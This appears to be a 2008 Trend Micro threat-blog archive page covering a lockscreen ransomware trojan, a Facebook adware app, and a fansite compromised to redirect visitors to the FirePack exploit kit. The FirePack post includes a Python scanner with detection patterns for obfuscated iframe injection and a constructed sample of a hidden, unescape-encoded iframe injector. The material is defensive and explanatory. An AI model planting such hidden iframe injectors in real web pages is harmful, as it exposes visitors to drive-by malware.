Archive for January 4th, 2008
January 4th, 2008 by Mayee Corpin (Technical Communications)
A new Trojan locks up machines completely and makes unwitting victims fork over an amount to be able to access their systems again, Sunbelt first reported. Trend Micro detects the said ransomware Trojan as TROJ_RANSOM.B.
TrendLabs found that users could download the said malware from the site http://{BLOCKED}s-numericos.info/handlers/get.php?aid=46. Once it is on a system and has dropped its components, it renders the user incapable of using his machine and displays the following image:

The message on top of the screen reads:
ERROR: Browser Security and Antiadware Software component license exprited!
Surfing PORN, ADULT and some other kind of sites you like without this software is dangerows and threatens with infection of your computer by harmful viruses, adware, spyware, etc… You strongly need to update your software to avoid infection and losting information from your computer. Please complete procedure of software update;
Because the system’s “antiadware software” is supposedly already expired, the Trojan asks for a reactivation fee, which affected users have the option of paying via SMS (short messaging service) or a phone call. If the user chooses the former, he/she need only send a text message to a specified number and will be charged £10, if in the UK. If, however, he/she chooses to make the call, he/she will be charged $35 in the US (or £1.50 per minute in the UK). Doing so, the user gets a “license code” that is the key to the “system unlock” that enables him/her to use his/her system again.
The numbers used are premium rate, according to The Register, and differ depending on which country the user is in. In the UK, the regulator PhonePayPlus has said in an interview with the aforementioned IT news site that an adult line could have been misused for this purpose.
The last we have seen of ransomware was back in August, when TROJ_GPCODE.AB and TROJ_GPCODE.AC were found to encrypt files with certain extensions, demanding $150 to have the user’s files decrypted. A little earlier, in July, another ransomware detected as TSPY_KOLLAH.F also encrypted files with certain extensions, but demanded a heftier price ($300) to decrypt the files with its software. Both left behind ransom notes in README text files, offering software that could crack open the files, with set deadlines, too.
This new strain takes a different tactic by actually sounding more polite, even saying the magic word “please”. Even so, it is more “cruel” in the sense that it holds hostage not just certain files but the machine itself.
Trend Micro customers are already protected from this threat and won’t find themselves locked out of their systems.
January 4th, 2008 by Jercyl Lerin (Technical Communications)
Facebook users, take heed: Some secrets are best left undisclosed, no matter how juicy and intriguing. Those who have encountered the application within Facebook called “Secret Crush” are bound to get a surprise because the said app actually loads adware/spyware that can spread in their friendly virtual neighborhood. With close to 60 million users and still growing, the popular social networking site is once again the target of a malicious attack.
Secret Crush was quickly branded a malicious widget by the security researchers who discovered it, seeing as how it poses as a legitimate application that promises to reveal someone’s admirer(s). In reality, it loads an adware/spyware associated with Zango, which historically has been linked to adware and spyware designed to gain access to certain games, DRM-protected videos, and software. In 2006, the FBI gave it a fine of US$3 million for allowing third parties to secretly install its adware.
Secret Crush also tricks affected users into forwarding the application to their friends on Facebook, increasing the chances of the program being passed around. The best thing that can happen once it is installed is that users come to realize that no list of their admirers will actually be revealed. But by then they would have already forwarded it to friends, who would have forwarded it to other friends, and so on. According to this post in Wired.com’s Threat Level blog, around 4% of total Facebook users have already added it, bringing the number of affected users to about a million.
Facebook’s popularity is increasingly drawing the attention of malicious users who wish to leverage the traffic generated by its millions of users. In one case, a certain porn company allegedly used automated scripts to mine data from more than 200,000 separate proprietary Facebook Web pages, as detailed in a December 2007 PCPro news report.
Secret Crush may be just one of the early threats to test Facebook friendships. Those with Facebook accounts had better pause before choosing to add it to their profiles and enjoining their contacts to do the same; otherwise it can spoil the fun of social networking.
January 4th, 2008 by Paul Ferguson (Advanced Threats Researcher)

Whoa is my Jets, but not only the team, but one of their fansites, and several other unrelated Web sites, too.
It leads to a redirect in Estonia, which in turn leads to an exploit server in New York. Go figure.
Here is yet another example of criminals taking advantage of, and compromising popular Web sites to further their criminal activities.
There are several Web sites that we have detected which have the exact same embedded iFrame(s) that may surreptitiously download malware to a vulnerable computer, but this one stood out above all others — due to my devotion to the New York Jets, of course.
Ironically, they’re located in the United States, too.
A “new” server-side malware toolkit has surfaced called “FirePack”, which is a play on the wording of previous malware-service toolkits (e.g. MPack, IcePack).
And yes, they actively exploit unwary visitors — or rather, surreptitiously “piped” malicious content via iFrame.
We’ll post more on FirePack later, but in the meantime, we’re taking measures to secure our customers against these threats.
In the meantime, don’t visit newyorkfanatic(dot)com.
More later — watch this space.
Updated: 4 January 2008, 19:30 PST
As promised, we’d like to provide a little more information on this nastiness.

Here’s a basic rundown of the infection chain, as depicted in the image above.
Users surfing to a compromised Web site that contains a malicious embedded iFrame (or an obfuscated JavaScript iFrame) set in motion a chain of very unfortunate events.
First, the iFrame (or an obfuscated JavaScript iFrame) contains a redirect to another Web site hosting the FirePack infection engine (we have also seen it loop through an intermediary redirect first), which then checks which browser (MS-IE/Firefox/Opera) the unwitting user is running.
The FirePack kit also hosts a number of exploits targeting specific vulnerabilities, including (but not limited to):
- Vulnerability in Microsoft XML Core Services Allows Remote Code Execution (MS06-071)
- Yahoo Webcam vulnerability
- Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (MS06-13)
- Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
- Vulnerability in Vector Markup Language Could Allow Remote Code Execution (MS07-004)
- Also, an Opera 0day 9.0-9.2 vulnerability released in October 2007!
If any of the vulnerabilities FirePack targets is found, vulnerable users have some very nasty malware downloaded to (and executed on) their systems. This malware creates one of the infamous NTOS.exe or WSNPOEM variants on the infected system, and their purpose is one thing, and one thing only: information theft.
Game over.
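The first link in the chain above, the injected iFrame, is also the easiest one for a site owner or a web-filtering team to spot without ever touching the exploit server. The scanner below is an added example written for this post; it is not code from Trend Micro, from FirePack, or from any compromised site. It parses a page's HTML, flags iFrames that are sized or styled so the visitor never sees them (recording whether they point off-site), and flags inline scripts that decode a payload at runtime with `unescape`/`String.fromCharCode` before writing it into the page, the usual shape of an "obfuscated JavaScript iFrame". The three sample pages and the hostnames in them are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Patterns common to obfuscated iframe injectors: the injected tag is
# decoded at runtime and written into the page so it is not visible in
# the static HTML. Names are labels for the report, not a real taxonomy.
OBFUSCATION_PATTERNS = {
    "document.write(unescape(...))": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "eval(unescape(...))": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "String.fromCharCode decoding": re.compile(r"String\.fromCharCode\s*\(", re.I),
    "URL-encoded <iframe": re.compile(r"%3Ciframe", re.I),
}


class _Collector(HTMLParser):
    """Collect every <iframe>'s attributes and every inline <script> body."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None  # non-None while inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def _is_hidden(attrs):
    """True if the iframe is sized or styled so that it never renders visibly."""
    for dim in ("width", "height"):
        if re.fullmatch(r"\s*[01](px)?\s*", attrs.get(dim, "")):
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return any(s in style for s in ("display:none", "visibility:hidden",
                                    "width:0", "height:0", "left:-", "top:-"))


def scan_page(html, page_host):
    """Return findings: hidden iframes (with off-site flag) and obfuscated scripts."""
    parser = _Collector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        if not _is_hidden(frame):
            continue  # visible frames are normal page content; leave them to a human
        src = frame.get("src", "")
        src_host = urlparse(src).hostname or page_host  # relative src == same site
        findings.append({"kind": "iframe", "src": src, "hidden": True,
                         "external": src_host != page_host})
    for body in parser.scripts:
        for name, pattern in OBFUSCATION_PATTERNS.items():
            if pattern.search(body):
                findings.append({"kind": "script", "pattern": name})
    return findings


# Constructed sample pages; the hosts are reserved example names, not real sites.
CLEAN_PAGE = """<html><body><h1>Team news</h1>
<iframe src="https://fans.example/schedule" width="600" height="400"></iframe>
<script>var x = 1;</script></body></html>"""

INJECTED_PAGE = """<html><body><h1>Team news</h1>
<iframe src="http://redirector.example.invalid/in.cgi?3" width="0" height="0"
 style="visibility:hidden"></iframe></body></html>"""

OBFUSCATED_PAGE = """<html><body><script>
document.write(unescape("%3Ciframe src=%22http://redirector.example.invalid/%22 width=0 height=0%3E%3C/iframe%3E"))
</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE),
                        ("obfuscated", OBFUSCATED_PAGE)):
        print(label, scan_page(page, "fans.example"))
```

Only hidden frames are reported, because a visible off-site iFrame is ordinary embedded content; the `external` flag is recorded so a triager can prioritise a hidden frame that also leaves the site. Run it over the HTML your own crawler or proxy already captures, and treat a hit as a reason to look at the page, not as proof of compromise on its own.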
The most important note here is one I like to make when the occasion presents itself, and that is why we (Trend Micro) have stepped up our efforts and focus on Web Threat Protection (WTP).
At the time of initial exploit, some of this new malware can be completely undetectable, and of course the time to implement new detection on the malware itself can be anywhere from hours to days. With our WTP efforts, we can quickly identify threats on the Internet, classify them, and integrate them into our WTP databases, so that our customers are alerted that a Web site they might be surfing is dangerous.
Let’s be careful out there!
Paul “Fergie” Ferguson and Ivan Macalintal
Network Security Intelligence
Advanced Threats Research